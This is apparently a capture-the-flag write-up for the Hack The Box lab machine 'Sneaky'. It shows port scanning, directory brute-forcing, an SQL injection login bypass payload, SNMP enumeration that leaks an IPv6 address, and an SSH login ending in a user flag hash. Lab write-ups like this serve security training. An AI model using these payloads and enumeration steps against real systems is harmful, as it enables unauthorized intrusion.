I start off with an nmap scan, only one port open:
└─# nmap -sC -sV -A 10.10.10.20
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Under Development!

Directory bruteforcing :
└─# gobuster dir -u http://10.10.10.20 -w /usr/share/wordlists/directory-list-2.3-medium.txt 
===============================================================
/dev

Visiting http://10.10.10.20/dev/; we find a login page. We try several combinations and admin' OR 1 = 1 -- - : password gets us in.
At some bruteforce doing admin ' OR 1 = 1 OR ''=' shows another username : thrasivoulos

└─# nmap -sU -p 161 10.10.10.20

PORT    STATE         SERVICE
161/udp open|filtered snmp

└─# snmpwalk -c public -v2c 10.10.10.20
└─# python enyx.py 2c public 10.10.10.20
[+] Grabbing IPv6.
[+] Loopback -> 0000:0000:0000:0000:0000:0000:0000:0001
[+] Unique-Local -> dead:beef:0000:0000:0250:56ff:feb9:2f89
[+] Link Local -> fe80:0000:0000:0000:0250:56ff:feb9:2f89

└─# ssh -i admin_key thrasivoulos@dead:beef:0000:0000:0250:56ff:feb9:2f89
thrasivoulos@Sneaky:~$ id
uid=1000(thrasivoulos) gid=1000(thrasivoulos) groups=1000(thrasivoulos),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
thrasivoulos@Sneaky:~$ cat user.txt
9fe14f76222db23a770f20136751bdab
